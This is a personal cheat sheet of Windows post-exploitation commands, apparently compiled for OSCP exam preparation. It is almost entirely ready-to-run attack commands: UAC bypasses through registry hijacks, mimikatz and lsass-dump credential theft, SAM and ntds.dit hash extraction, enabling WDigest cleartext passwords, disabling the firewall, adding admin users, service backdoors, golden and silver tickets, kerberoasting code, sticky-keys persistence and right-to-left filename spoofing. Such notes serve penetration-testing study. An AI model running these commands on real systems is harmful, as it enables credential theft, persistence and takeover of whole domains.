|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/                

Last changed: 13.01.2020

Windows post exploitation


This is another part of my notes I started to collect during my Offensive Security Certified Professional exam peparations.

A nice collection of further red teaming procedures can be found on https://ired.team/.

login information


username

whoami
whoami /all
net user %username%

system information


version and service pack info

ver
systeminfo

environment variables

set

hostname

hostname
net config workstation

running tasks

tasklist /V
tasklist /svc
taskkill /pid 1234

open files

openfiles /local on
openfiles /query

installed software

wmic product get name,vendor,version

uninstall security update

wusa /uninstall /kb:1234567 /quiet /norestart

group policies

gpresult /user victim /z > user_gpo.txt
gpresult /user victim /scope computer /z > computer_gpo.txt
nbtstat -n
nltest /dclist:target.domain
dir \\DC\SYSVOL\
robocopy /e \\DC\SYSVOL\target.domain\Policies .

user management


usernames and privileges

net user
net user /domain
[adsi]"WinNT://$env:userdomain/$env:username,user" | select *
net localgroup
net user Administrator new_password /active:yes

create new admin user

net user admin password /add
net localgroup administrators admin /add

uac bypass

reg add "hkcu\software\classes\mscfile\shell\open\command" /t REG_SZ /d "c:\windows\system32\cmd.exe /c whoami /priv > c:\bypass.txt" /f
eventvwr.exe
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c notepad.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f 
sdclt.exe

hash extraction


lsass process

wce.exe
wce.exe -d

lsass process (meterpreter)

run post/windows/gather/hashdump

lsass process (mimikatz)

To get a list of available modules enter :: in mimikatz.

privilege::debug
sekurlsa::logonPasswords
token::whoami
token::elevate
lsadump::cache
lsadump::sam
sekurlsa::pth /user:Administrator /domain:. /ntlm:<admin-hash>

lsass core dump (mimikatz)

procdump -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" exit

registry

To dump hashes of local accounts from the registry pwdump and cachedump from creddump7 or secretsdump from Impacket can be used.

reg save hklm\sam c:\SAM
reg save hklm\system c:\SYSTEM
reg save hklm\security c:\SECURITY
pwdump SYSTEM SAM
cachedump SYSTEM SECURITY True
secretsdump.py -sam SAM -system SYSTEM -securty SECURITY LOCAL

user privileges

If you want to extract the hash of the current user without administrator privileges you can use inveigh and create a local http server which will dump the NetNTLMv2 authentication data

. .\inveigh.ps1
invoke-inveigh -llmnr n
"C:\Program Files\Internet Explorer\iexplore.exe" "http://localhost/"
stop-inveigh
get-inveigh -ntlmv2

domain controller

To extract password hashes from an active directory you will need the file ntds.dit and the SYSTEM registry hive from the domain controller. The location of the ntds.dit can be found in the registry.

reg query hklm\system\currentcontrolset\services\ntds\parameters

Then you can use the tools Libesedb and ntdsxtract.

esedbexport -m tables ntds.dit
dsuser.py datatable link_table output --syshive SYSTEM --passwordhashes --pwdformat ophc --ntoutfile hashes.nt -lmoutfile hashes.lm

Impacket can extract the hashes in one step

secretsdump.py -ntds ntds.dit -system SYSTEM -just-dc-ntlm LOCAL > hashes.txt

enable wdigest cleartext password storage

reg add hklm\system\currentcontrolset\control\securityproviders\wdigest /v UseLogonCredential /t REG_DWORD /d 1 /f

network configuration


network interfaces

ipconfig /all
netsh int ip set address "local area connection" static 10.0.0.11 255.255.255.0

modify routes

route print
route add 10.1.1.0 mask 255.255.255.0 192.168.11.3

enable IP forwarding

reg add hklm\system\currentcontrolset\services\remoteaccess \v Start \t REG_DWORD \d 2 \f
sc start remoteaccess

open ports

netstat -nabo

port forwarding

netsh in portproxy add v4tov4 listenport=8080 connectaddress=10.0.0.99 connectport=80

disable firewall

netsh firewall set opmode disable
netsh advfirewall set allprofiles state off

enable remote desktop

reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall show rule name=all | find /i "remote" | find /i "desktop"
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

login (from linux)

xfreerdp /u:user /p:password /v:<target>

file system


list disks

wmic logicaldisk get filesystem,freespace,name,size,volumename

searching

type file.txt | find /n /i "string"
dir /s /r | find ":$DATA"
forfiles /p c:\users /s /m *.exe /c "cmd /c echo @fdate @ftime @fsize @file"

volume shadow copy

Windows Server allows invoking shadow copies via vssadmin. This can help to copy files which are locked for reading.

vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY SECURITY.bak

scheduled tasks


list tasks

schtasks.exe

create task

schtasks /create /sc minute /tn test /tr cmd.exe
schtasks /run /tn test
schtasks /delete /tn test /f

services


list services

sc query

create service

sc create new_service binpath= "cmd /K start c:\backdoor.exe" start=auto error=ignore
sc qc new_service

modify service

sc config new_service binpath= "cmd /K start c:\new_backdoor.exe"
sc start new_service

windows network


netbios discovery (from linux)

nbtscan -v 192.168.11.0/24
nmap 192.168.11.2 --script smb-enum-users.nse
nmap 192.168.11.2 --script smb-check-vulns.nse
rpcclient -U "" 192.168.11.2

netbios discovery (from windows)

nbtstat -A <target>

rpcclient

rpcclient -U user 10.168.11.2
$> srvinfo
$> enumdomains
$> enumdomusers

server message block


smb file share

net share
net share test=c:\test
net use x: \\<target>\test
net use x: /delete
net share test /delete

mount share in linux

mount -t cifs //<target>/test /mnt/cifs -o username=user

create smb server in linux

Impacket contains a simple smb server script.

python smbserver.py share /tmp/share

remote command execution

psexec -accepteula -u Administrator -p password //<target> <command>
winexe -U Administrator%password //<target> <command>
rpcclient -U Administrator <target>

windows domain


join domain

Needs local administrator privileges and valid user credentials for the domain.

add-computer -domainname target -credential user_xy -restart
remove-computer -unjoindomaincredential user_xy -restart

join organisational unit

import-module .\powersploit\Recon\Recon.psm1
get-netdomaincontroller -domain target -credential user_xy
get-netou -domaincontroller dc1.target.com -credential user_xy -fulldata
add-computer -domainname target -oupath "OU=Domain Controllers,DC=target,DC=com" -newname dc2 -credential user_xy
restart-computer

pass the ticket

klist
klist tgt
klist purge

To export and reuse tickets in a Pass-The-Ticket attack you can use mimikatz

cd %temp%
sekurlsa::tickets /export
kerberos::ptt [...]...-Administrator@krbtgt-target.com.kirbi
misc::cmd

If there is no TGT available maybe a service ticket can be found and reused for that specific service.

golden ticket

To acquire the hash of the krbtgt service you will need domain administrator privileges. With these you can copy the ntds.dit (see above) or use mimikatz

lsadump::dcsync /domain:target.com /user:krbtgt

With this information anyone can create a TGT containing the SID of the domain administrator (-500) and use it in a Pass-The-Ticket attack.

kerberos::golden /domain:target.com /sid:<DOMAIN_SID> /rc4:<NTLM_HASH> /user:whatever

If a nonexistent username is chosen the TGT will become invalid after 20 minutes.

silver ticket

If you have the ntlm hash of a machine account you can create service tickets for the services running on the machine.

kerberos::golden /domain:target.com /sid:<DOMAIN_SID> /rc4:<NTLM_HASH /user:whatever /target:fileserver.target.com /service: cifs /ptt
misc::cmd

Machine account passwords can be extracted from the registry

lsadump.py SYSTEM SECURITY true
secretsdump.py -system SYSTEM -security SECURITY LOCAL

You will need the ntlm hash from the machine account plaintext password.

echo <PLAINTEXT_PASSWORD> | sed 's/../\\x&/g'
perl -e 'use Digest::MD4 "md4_hex"; print md4_hex("<ESCAPED_HEX_STRING>")."\n";'

kerberoasting

Sometimes services are not associated to a machine account but to a dedicated service logon account. If a weak password is setup for this service logon account it can be optained by cracking an encrypted service ticket. This can be done with user privileges.

setspn -T infected -Q */* | select-string -pattern "CN=User|CN=Managed" -context 0,1
$Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel')
$Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -argumentlist "IIS/server.target.com:80"
$TicketHexStream = [System.BitConverter]::ToString($Ticket.GetRequest()) -replace "-"
[System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split "A48201"
$Parts.RemoveAt($Parts.Count - 1)
$CipherText = $Parts -join "A48201"
$Hash = "$($CipherText.Substring(0,32))`$$($CipherText.Substring(32))"
$HashFormat = "`$krb5tgs`$23`$*`$IIS-Account`$target.com`$IIS/server.target.com:80*`$$Hash"

The hash should have the format $krb5tgs$<ETYPE>$*<ACCOUNT>$<DOMAIN>$<SPN>*$<HASH>. It can be cracked with hashcat

hashcat -m 13100 hashfile wordlist

Alternatviely you can run Invoke-Kerberoast.ps1 from the EmpireProject to acquire the hash in one go.

dpapi


The Windows Data Protection API (dpapi) offers transparent methods for encrypted storage of data. If you want to decrypt this data mimikatz can be used.

dpapi::protect /data:"testdata" /out:"blob.bin"
dpapi::blob /in:"blob.bin" /unprotect

The password used to protect a masterkey can be cracked.

attrib /S %appdata%\microsoft\protect\*
dpapi::blob /in:"blob.bin"
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<MASTERKEY_FILE>"

Hashcat supports encrypted masterkeys in the following format:

$DPAPImk$<VERSION>*<CONTEXT>*<SID>*<ENC_METHOD>*<HASH_ALG>*<ROUNDS>*<SALT>*<ENC_KEY_LEN>*<ENC_KEY>
    VERSION:        1=des3+sha1; 2=aes256+sha512
    CONTEXT:        1=local; 2=domain
    ENC_METHOD:     des3 || aes256
    HASH_ALG:       sha1 || sha512
    ENC_KEY_LEN:    208 || 288

hashcat -m 15900 dpapi_mk_v2.hash wordlist -O

With the cracked password the masterkey and with it the dpapi blob can be decrypted.

dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<MASTERKEY_FILE>" /sid:<SID> /password:<PASSWORD>
dpapi::blob /in:"blob.bin" /masterkey:<MASTERKEY>

parsing outlook mailbox


The libpst package contains tools for converting outlook .pst files

readpst -o extracted_mails mailbox.pst

persistent login bypass


sticky key

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

ease of access

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

hiding file extension


‮cod.yrammusevituc‭new.exe

&#x202e;cod.yrammusevituc&#x202d;new.exe